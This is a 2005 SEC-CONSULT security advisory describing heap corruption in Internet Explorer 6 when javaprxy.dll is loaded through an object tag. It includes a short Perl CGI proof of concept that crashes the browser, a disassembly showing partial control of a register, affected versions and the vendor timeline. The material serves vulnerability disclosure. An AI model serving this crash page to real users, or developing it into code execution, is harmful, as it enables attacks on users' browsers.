IE6 javaprxy.dll COM instantiation heap corruption

SEC-CONSULT Security Advisory < 20050629-0 >


title: IE6 javaprxy.dll COM instantiation heap corruption


program: Internet Explorer

vulnerable version: 6.0.2900.2180


found: 2005-06-17

by: sk0L & Martin Eiszner / SEC-CONSULT /







Internet Explorer supports instantiation of non-ActiveX controls, e.g COM objects, via <object> tags. according to M$, COM components respond gracefully to attempts to treat them as ActiveX controls. on the contrary, we found that at least 20 of the objects available on an average XP system either lead to an instant crash or an exception after a few reloads.



vulnerability overview:



Loading HTML documents with certain embedded CLSIDs results in null-pointer exceptions or memory corruption. in one case, we could leverage this bug to overwrite a function pointer in the data segment. it *may* be possible to exploit this issue to execute arbitrary code in the context of IE.



proof of concept:



this simple CGI should crash IE.




# in order for this to work javaprxy.dll must be available on the client.

my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll

my $html1 = "<html><body>\n<object classid=\"CLSID:".$clsid."\"></object>\n";
my $html2 = "\n</body><script>location.reload();</script></html>\n";

print "Content-Type: text/html;\r\n\r\n";

print $html1.("A"x30000).$html2;


on our lab machine, we, end up with eax=00410041, and an exception occurs at the following location in javaprxy.dll:


.text:7C508660                 mov     eax, [ecx]
.text:7C508662                 test    eax, eax
.text:7C508664                 jz      short locret_7C50866C
.text:7C508666                 mov     ecx, [eax]
.text:7C508668                 push    eax
.text:7C508669                 call    dword ptr [ecx+8]



as you can see, this situation may be exploitable, considering that we have some level of control over eax.



vulnerable versions:



javaprxy.dll 5.00.3810

internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519


these are the versions tested, other versions may of course be vulnerable.


vendor status:


vendor notified: 2005-06-17

vendor response: 2005-06-17

patch available: ?


microsoft does not confirm the vulnerability, as their product team can not reproduce condition. however, they are looking at making changes to handle COM objects in a more robust manner in the future.


UPDATE (2005-06-30): we have been informed that microsoft now confirms the issue, as it has been successfully reproduced with the version numbers listed above. they are currently working on a bug fix.



< Bernhard Müller / Martin Eiszner > / /

SGT ::: walter|bruder, flo, tke, dfa :::